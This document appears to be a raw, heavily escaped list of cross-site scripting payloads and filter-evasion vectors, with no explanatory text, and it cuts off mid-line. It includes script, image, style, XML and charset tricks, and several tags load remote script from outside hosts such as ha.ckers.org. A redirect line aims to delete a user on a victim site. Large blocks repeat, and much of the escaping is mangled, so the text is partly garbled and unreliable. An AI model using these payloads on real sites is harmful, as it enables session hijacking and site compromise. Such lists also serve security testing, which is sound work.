SRC=\\\";\\\"&gt;\\r\\n&lt;img SRC=\\\" &#14; ;\\\"&gt;\\r\\n&lt;body !#$%&()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;&gt;\\r\\n&lt;document.vulnerable=true;//&lt;\\r\\n&lt;script &lt;B&gt;document.vulnerable=true;\\r\\n&lt;img SRC=\\\";\\\"\\r\\n&lt;iframe src=\\\"; &lt;\\r\\na=/XSS/\\\\ndocument.vulnerable=true;\\r\\n\\\\\\\";document.vulnerable=true;;//\\r\\n&lt;/title&gt;document.vulnerable=true;\\r\\n&lt;input TYPE=\\\"IMAGE\\\" SRC=\\\";\\\"&gt;\\r\\n&lt;body BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;body =document.vulnerable=true;&gt;\\r\\n&lt;img DYNSRC=\\\";\\\"&gt;\\r\\n&lt;img LOWSRC=\\\";\\\"&gt;\\r\\n&lt;bgsound SRC=\\\";\\\"&gt;\\r\\n&lt;br SIZE=\\\"&{document.vulnerable=true}\\\"&gt;\\r\\n&lt;LAYER SRC=\\\";\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;link REL=\\\"stylesheet\\\" HREF=\\\";\\\"&gt;\\r\\n&lt;style&gt;li {list-style-image: url(\\\";\\\");&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;img SRC=\\\';\\\'&gt;\\r\\n1script3document.vulnerable=true;1/script3\\r\\n&lt;meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=;\\\"&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=;\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\";\\\"&gt;&lt;/iframe&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\";\\\"&gt;&lt;/frameset&gt;\\r\\n&lt;table BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;table&gt;&lt;TD BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;div STYLE=\\\"background-image: url(;)\\\"&gt;\\r\\n&lt;div STYLE=\\\"background-image: url(&#1;;)\\\"&gt;\\r\\n&lt;div STYLE=\\\"width: document.vulnerable=true);\\\"&gt;\\r\\n&lt;style&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';&lt;/style&gt;\\r\\n&lt;img STYLE=\\\"xss:expr/*XSS*/ession(document.vulnerable=true)\\\"&gt;\\r\\n&lt;XSS STYLE=\\\"xss:document.vulnerable=true)\\\"&gt;\\r\\nexp/*&lt;A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\'&gt;\\r\\n&lt;style TYPE=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;style&gt;.XSS{background-image:url(\\\"\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/a&gt;\\r\\n&lt;style type=\\\"text/css\\\"&gt;BODY{background:url(\\\"\\\")}&lt;/style&gt;\\r\\n&lt;!--[if gte IE 4]&gt;document.vulnerable=true;&lt;![endif]--&gt;\\r\\n&lt;base HREF=\\\";//\\\"&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=;&lt;/object&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG SRC=\\\"javas]]&lt;![cript:document.vulnerable=true;\\\"&gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;\\r\\n&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\"javas&lt;!-- --&gt;cript:document.vulnerable=true\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/span&gt;\\r\\n&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;document.vulnerable=true\\\"&gt;&lt;/BODY&gt;&lt;/html&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';echo(\\\'IPT&gt;document.vulnerable=true\\\'); ?&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=document.vulnerable=true\\\"&gt;\\r\\n&lt;head&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;a href=\\\"javascript#document.vulnerable=true;\\\"&gt;\\r\\n&lt;div =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;img src=\\\";\\\"&gt;\\r\\n&lt;img dynsrc=\\\";\\\"&gt;\\r\\n&lt;input type=\\\"image\\\" dynsrc=\\\";\\\"&gt;\\r\\n&lt;bgsound src=\\\";\\\"&gt;\\r\\n&document.vulnerable=true;\\r\\n&{document.vulnerable=true;};\\r\\n&lt;img src=&{document.vulnerable=true;};&gt;\\r\\n&lt;link rel=\\\"stylesheet\\\" href=\\\";\\\"&gt;\\r\\n&lt;iframe src=\\\";\\\"&gt;\\r\\n&lt;img src=\\\";\\\"&gt;\\r\\n&lt;img src=\\\";\\\"&gt;\\r\\n&lt;a href=\\\"about:document.vulnerable=true;\\\"&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\"&gt;\\r\\n&lt;body =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;div style=\\\"background-image: url(;);\\\"&gt;\\r\\n&lt;div style=\\\"behaviour: url([link to code]);\\\"&gt;\\r\\n&lt;div style=\\\"binding: url([link to code]);\\\"&gt;\\r\\n&lt;div style=\\\"width: document.vulnerable=true;);\\\"&gt;\\r\\n&lt;style type=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;object classid=\\\"clsid:...\\\" codebase=\\\";\\\"&gt;\\r\\n&lt;style&gt;&lt;!--&lt;/style&gt;document.vulnerable=true;//--&gt;\\r\\n&lt;document.vulnerable=true;\\r\\n&lt;![&lt;!--]]document.vulnerable=true;//--&gt;\\r\\n&lt;!-- -- --&gt;document.vulnerable=true;&lt;!-- -- --&gt;\\r\\n&lt;img src=\\\"blah\\\"=\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;img src=\\\"blah&gt;\\\" =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;xml src=\\\";\\\"&gt;\\r\\n&lt;xml id=\\\"X\\\"&gt;&lt;a&gt;&lt;b&gt;document.vulnerable=true;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;\\r\\n&lt;div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"&gt;&lt;/div&gt;\\r\\n[\\\\xC0][\\\\xBC]script&gt;document.vulnerable=true;[\\\\xC0][\\\\xBC]/script&gt;\\r\\n&lt;style&gt;@import\\\'http://www.securitycompass.com/xss.css\\\';&lt;/style&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;style&gt;BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}&lt;/style&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"&gt;&lt;/object&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;\\r\\n&lt;script SRC=\\\"http://www.securitycompass.com/xss.jpg\\\"&gt;\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'&lt;SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js&gt;\\\'\\\"--&gt;\\r\\n&lt;script a=\\\"&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script =\\\"&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script a=\\\"&gt;\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script \\\"a=\\\'&gt;\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script a=`&gt;` SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script a=\\\"&gt;\\\'&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n(\\\"&lt;SCRI\\\");PT SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;div style=\\\"binding: url(http://www.securitycompass.com/xss.js);\\\"&gt; [Mozilla]\\r\\n">&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;"XSS"&#41;&gt;\\r\\n\\r\\n</br >\\r\\n<scrscriptipt>alert&#40;1&#41;</scrscriptipt>\\r\\n<br size=\\\\"&{alert&#40;'XSS'&#41;}\\\\">\\r\\nperl -e 'print \\\\"<IMG >\\\\";' > out\\r\\nperl -e 'print \\\\"<SCR\\\\0IPT>alert&#40;\\\\"XSS\\\\"&#41;</SCR\\\\0IPT>\\\\";' > out\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression=\\\"http://www.procheckup.com/?sid=\\\"+)&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;~/XSS STYLE=xss:alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n\\\"&gt;alert&#40;\\\'XSS\\\'&#41;\\r\\n&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\nXSS STYLE=xss:e/**/xpression(alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n&lt;/XSS STYLE=xss:alert&#40;\\\'XSS\\\'&#41;)&gt;\\r\\n\\\';;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";;alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;;&lt;;/SCRIPT&gt;;\\\";&gt;;\\\';&gt;;&lt;;SCRIPT&gt;;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;;/SCRIPT&gt;;\\r\\n\\\';\\\';;!--\\\";&lt;;XSS&gt;;=&;{()}\\r\\n&lt;;SCRIPT&gt;;alert&#40;\\\';XSS\\\';&#41;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT&gt;;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;;/SCRIPT&gt;;\\r\\n&lt;;BASE HREF=\\\";(\\\';XSS\\\';);//\\\";&gt;;\\r\\n&lt;;BGSOUND SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;BODY BACKGROUND=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;BODY =alert&#40;\\\';XSS\\\';&#41;&gt;;\\r\\n&lt;;DIV STYLE=\\\";background-image: url((\\\';XSS\\\';))\\\";&gt;;\\r\\n&lt;;DIV STYLE=\\\";background-image: url(&;#1;(\\\';XSS\\\';))\\\";&gt;;\\r\\n&lt;;DIV STYLE=\\\";width: alert&#40;\\\';XSS\\\';&#41;);\\\";&gt;;\\r\\n&lt;;FRAMESET&gt;;&lt;;FRAME SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;&lt;;/FRAMESET&gt;;\\r\\n&lt;;IFRAME SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;&lt;;/IFRAME&gt;;\\r\\n&lt;;INPUT TYPE=\\\";IMAGE\\\"; SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=(\\\';XSS\\\';)&gt;;\\r\\n&lt;;IMG DYNSRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG LOWSRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\";&gt;;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser\\r\\nexp/*&lt;;XSS STYLE=\\\';no\\\\xss:noxss(\\\";*//*\\\";);\\r\\n&lt;;STYLE&gt;;li {list-style-image: url(\\\";('XSS')\\\";);}&lt;;/STYLE&gt;;&lt;;UL&gt;;&lt;;LI&gt;;XSS\\r\\n&lt;;IMG SRC=\\\';(\\\";XSS\\\";)\\\';&gt;;\\r\\n&lt;;LAYER SRC=\\\";http://ha.ckers.org/scriptlet.html\\\";&gt;;&lt;;/LAYER&gt;;\\r\\n&lt;;IMG SRC=\\\";\\\";&gt;;\\r\\nalert&#40;\\\';XSS\\\';&#41;;\\r\\n\\\\\\\";;alert&#40;\\\';XSS\\\';&#41;;//\\r\\n&lt;;/TITLE&gt;;&lt;;SCRIPT&gt;;alert&#40;\\\"XSS\\\"&#41;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;STYLE&gt;;@im\\\\port\\\';\\\\ja\\\\vasc\\\\ript:alert&#40;\\\";XSS\\\";&#41;\\\';;&lt;;/STYLE&gt;;\\r\\n&lt;;IMG SRC=\\\";(\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";jav&;#x09;ascript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";jav&;#x0A;ascript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;IMG SRC=\\\";jav&;#x0D;ascript:alert&#40;\\\';XSS\\\';&#41;;\\\";&gt;;\\r\\n&lt;;IMG&#x0D;SRC&#x0D;=&#x0D;\\\";&#x0D;javascript&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;\\\';&#x0D;X&#x0D;S&#x0D;S&#x0D;\\\';&#x0D;)&#x0D;\\\";&#x0D;&gt;;&#x0D;\\r\\nperl -e \\\';print \\\";&lt;;IM SRC=java\\\\0script:alert&#40;\\\";XSS\\\";&#41;&gt;\\\";;\\\';&gt;; out\\r\\nperl -e \\\';print \\\";&;&lt;;SCR\\\\0IPT&gt;;alert&#40;\\\";XSS\\\";&#41;&lt;;/SCR\\\\0IPT&gt;;\\\";;\\\'; &gt;; out\\r\\n&lt;;IMG SRC=\\\"; &;#14; (\\\';XSS\\\';);\\\";&gt;;\\r\\n&lt;;SCRIPT/XSS SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\";XSS\\\";&#41;&gt;;\\r\\n&lt;;SCRIPT SRC=http://ha.ckers.org/xss.js\\r\\n&lt;;SCRIPT SRC=//ha.ckers.org/.j&gt;;\\r\\n&lt;;IMG SRC=\\\";(\\\';XSS\\\';)\\\";\\r\\n&lt;;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;;\\r\\n&lt;;&lt;;SCRIPT&gt;;alert&#40;\\\";XSS\\\";&#41;;//&lt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;IMG \\\";\\\";\\\";&gt;;&lt;;SCRIPT&gt;;alert&#40;\\\";XSS\\\";&#41;&lt;;/SCRIPT&gt;;\\\";&gt;;\\r\\n&lt;;SCRIPT&gt;;a=/XSS/\\r\\n&lt;;SCRIPT a=\\\";&gt;;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT =\\\";blah\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT a=\\\";blah\\\"; \\\';\\\'; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT \\\";a=\\\';&gt;;\\\';\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT a=`&gt;;` SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT&gt;;(\\\";&lt;;SCRI\\\";);&lt;;/SCRIPT&gt;;PT SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT a=\\\";&gt;\\\';&gt;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;A HREF=\\\";http://66.102.7.147/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://www.google.com\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://1113982867/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://0x42.0x0000066.0x7.0x93/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://0102.0146.0007.00000223/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";h tt p://6&;#09;6.000146.0x7.147/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";//www.google.com/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";//google\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://ha.ckers.org@google\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://google:ha.ckers.org\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://google.com/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://www.google.com./\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";\\\';http://www.google.com/\\\';\\\";&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\";http://www.gohttp://www.google.com/ogle.com/\\\";&gt;;XSS&lt;;/A&gt;;\\r\\ndocument.vulnerable=true;\\r\\n&lt;img SRC=\\\";\\\"&gt;\\r\\n&lt;img SRC=\\\";\\\"&gt;\\r\\n&lt;img SRC=\\\" &#14; ;\\\"&gt;\\r\\n&lt;body !#$%&()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;&gt;\\r\\n&lt;document.vulnerable=true;//&lt;\\r\\n&lt;script &lt;B&gt;document.vulnerable=true;\\r\\n&lt;img SRC=\\\";\\\"\\r\\n&lt;iframe src=\\\"; &lt;\\r\\na=/XSS/\\\\ndocument.vulnerable=true;\\r\\n\\\\\\\";document.vulnerable=true;;//\\r\\n&lt;/title&gt;document.vulnerable=true;\\r\\n&lt;input TYPE=\\\"IMAGE\\\" SRC=\\\";\\\"&gt;\\r\\n&lt;body BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;body =document.vulnerable=true;&gt;\\r\\n&lt;img DYNSRC=\\\";\\\"&gt;\\r\\n&lt;img LOWSRC=\\\";\\\"&gt;\\r\\n&lt;bgsound SRC=\\\";\\\"&gt;\\r\\n&lt;br SIZE=\\\"&{document.vulnerable=true}\\\"&gt;\\r\\n&lt;LAYER SRC=\\\";\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;link REL=\\\"stylesheet\\\" HREF=\\\";\\\"&gt;\\r\\n&lt;style&gt;li {list-style-image: url(\\\";\\\");&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;img SRC=\\\';\\\'&gt;\\r\\n1script3document.vulnerable=true;1/script3\\r\\n&lt;meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=;\\\"&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=;\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\";\\\"&gt;&lt;/iframe&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\";\\\"&gt;&lt;/frameset&gt;\\r\\n&lt;table BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;table&gt;&lt;TD BACKGROUND=\\\";\\\"&gt;\\r\\n&lt;div STYLE=\\\"background-image: url(;)\\\"&gt;\\r\\n&lt;div STYLE=\\\"background-image: url(&#1;;)\\\"&gt;\\r\\n&lt;div STYLE=\\\"width: document.vulnerable=true);\\\"&gt;\\r\\n&lt;style&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';&lt;/style&gt;\\r\\n&lt;img STYLE=\\\"xss:expr/*XSS*/ession(document.vulnerable=true)\\\"&gt;\\r\\n&lt;XSS STYLE=\\\"xss:document.vulnerable=true)\\\"&gt;\\r\\nexp/*&lt;A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\'&gt;\\r\\n&lt;style TYPE=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;style&gt;.XSS{background-image:url(\\\"\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/a&gt;\\r\\n&lt;style type=\\\"text/css\\\"&gt;BODY{background:url(\\\"\\\")}&lt;/style&gt;\\r\\n&lt;!--[if gte IE 4]&gt;document.vulnerable=true;&lt;![endif]--&gt;\\r\\n&lt;base HREF=\\\";//\\\"&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=;&lt;/object&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG SRC=\\\"javas]]&lt;![cript:document.vulnerable=true;\\\"&gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;\\r\\n&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\"javas&lt;!-- --&gt;cript:document.vulnerable=true\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/span&gt;\\r\\n&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;document.vulnerable=true\\\"&gt;&lt;/BODY&gt;&lt;/html&gt;\\r\\n&lt;? echo(\\\'&lt;SCR)\\\';echo(\\\'IPT&gt;document.vulnerable=true\\\'); ?&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=document.vulnerable=true\\\"&gt;\\r\\n&lt;head&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;a href=\\\"javascript#document.vulnerable=true;\\\"&gt;\\r\\n&lt;div =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;img src=\\\";\\\"&gt;\\r\\n&lt;img dynsrc=\\\";\\\"&gt;\\r\\n&lt;input type=\\\"image\\\" dynsrc=\\\";\\\"&gt;\\r\\n&lt;bgsound src=\\\";\\\"&gt;\\r\\n&document.vulnerable=true;\\r\\n&{document.vulnerable=true;};\\r\\n&lt;img src=&{document.vulnerable=true;};&gt;\\r\\n&lt;link rel=\\\"stylesheet\\\" href=\\\";\\\"&gt;\\r\\n&lt;iframe src=\\\";\\\"&gt;\\r\\n&lt;img src=\\\";\\\"&gt;\\r\\n&lt;img src=\\\";\\\"&gt;\\r\\n&lt;a href=\\\"about:document.vulnerable=true;\\\"&gt;\\r\\n&lt;meta http-equiv=\\\"refresh\\\" content=\\\"0;url=;\\\"&gt;\\r\\n&lt;body =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;div style=\\\"background-image: url(;);\\\"&gt;\\r\\n&lt;div style=\\\"behaviour: url([link to code]);\\\"&gt;\\r\\n&lt;div style=\\\"binding: url([link to code]);\\\"&gt;\\r\\n&lt;div style=\\\"width: document.vulnerable=true;);\\\"&gt;\\r\\n&lt;style type=\\\"text/javascript\\\"&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;object classid=\\\"clsid:...\\\" codebase=\\\";\\\"&gt;\\r\\n&lt;style&gt;&lt;!--&lt;/style&gt;document.vulnerable=true;//--&gt;\\r\\n&lt;document.vulnerable=true;\\r\\n&lt;![&lt;!--]]document.vulnerable=true;//--&gt;\\r\\n&lt;!-- -- --&gt;document.vulnerable=true;&lt;!-- -- --&gt;\\r\\n&lt;img src=\\\"blah\\\"=\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;img src=\\\"blah&gt;\\\" =\\\"document.vulnerable=true;\\\"&gt;\\r\\n&lt;xml src=\\\";\\\"&gt;\\r\\n&lt;xml id=\\\"X\\\"&gt;&lt;a&gt;&lt;b&gt;document.vulnerable=true;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;\\r\\n&lt;div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"&gt;&lt;/div&gt;\\r\\n[\\\\xC0][\\\\xBC]script&gt;document.vulnerable=true;[\\\\xC0][\\\\xBC]/script&gt;\\r\\n&lt;style&gt;@import\\\'http://www.securitycompass.com/xss.css\\\';&lt;/style&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;style&gt;BODY{:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}&lt;/style&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"&gt;&lt;/object&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;\\r\\n&lt;script SRC=\\\"http://www.securitycompass.com/xss.jpg\\\"&gt;\\r\\n&lt;!--#exec cmd=\\\"/bin/echo \\\'&lt;SCR\\\'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js&gt;\\\'\\\"--&gt;\\r\\n&lt;script a=\\\"&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script =\\\"&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script a=\\\"&gt;\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script \\\"a=\\\'&gt;\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script a=`&gt;` SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;script a=\\\"&gt;\\\'&gt;\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n(\\\"&lt;SCRI\\\");PT SRC=\\\"http://www.securitycompass.com/xss.js\\\"&gt;\\r\\n&lt;div style=\\\"binding: url(http://www.securitycompass.com/xss.js);\\\"&gt; [Mozilla]\\r\\n\\\";&gt;;&lt;;BODY !#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\";XSS\\\";&#41;&gt;;\\r\\n&lt;;/script&gt;;&lt;;script&gt;;alert&#40;1&#41;&lt;;/script&gt;;\\r\\n&lt;;/br style=a:alert&#40;&#41;)&gt;;\\r\\n&lt;;scrscriptipt&gt;;alert&#40;1&#41;&lt;;/scrscriptipt&gt;;\\r\\n&lt;;br size=\\\\\\\";&;{alert&#40;'XSS'&#41;}\\\\\\\";&gt;;\\r\\nperl -e 'print \\\\\\\";&lt;;IMG 